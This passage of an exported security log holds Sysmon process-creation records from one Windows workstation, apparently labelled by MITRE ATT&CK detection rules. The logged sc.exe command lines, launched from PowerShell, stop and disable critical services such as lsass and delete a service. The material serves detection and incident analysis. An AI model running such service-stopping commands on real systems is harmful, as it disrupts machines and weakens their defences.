{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.169"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00106bdd2a00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.491",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.093 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010e8d82a00} +ProcessId: 3580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.099893100Z"",""eventRecordID"":""3114"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.093\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010e8d82a00}\r\nProcessId: 3580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.093"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010e8d82a00}"",""processId"":""3580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.428",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.726 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010cccf2a00} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.730510000Z"",""eventRecordID"":""3111"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.726\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010cccf2a00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.726"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010cccf2a00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.387",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.709 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-001048ce2a00} +ProcessId: 7500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config lsass Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config lsass Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.712563600Z"",""eventRecordID"":""3110"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.709\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-001048ce2a00}\r\nProcessId: 7500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config lsass Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.709"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-001048ce2a00}"",""processId"":""7500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config lsass Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.101",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.683 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-00105acc2a00} +ProcessId: 1948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.686042700Z"",""eventRecordID"":""3108"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.683\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-00105acc2a00}\r\nProcessId: 1948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.683"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-00105acc2a00}"",""processId"":""1948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.032",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.646 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dac92a00} +ProcessId: 5660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.648268300Z"",""eventRecordID"":""3105"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.646\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dac92a00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.646"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dac92a00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:51.996",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.609 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dec72a00} +ProcessId: 7824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.612159900Z"",""eventRecordID"":""3103"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.609\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dec72a00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.609"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dec72a00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 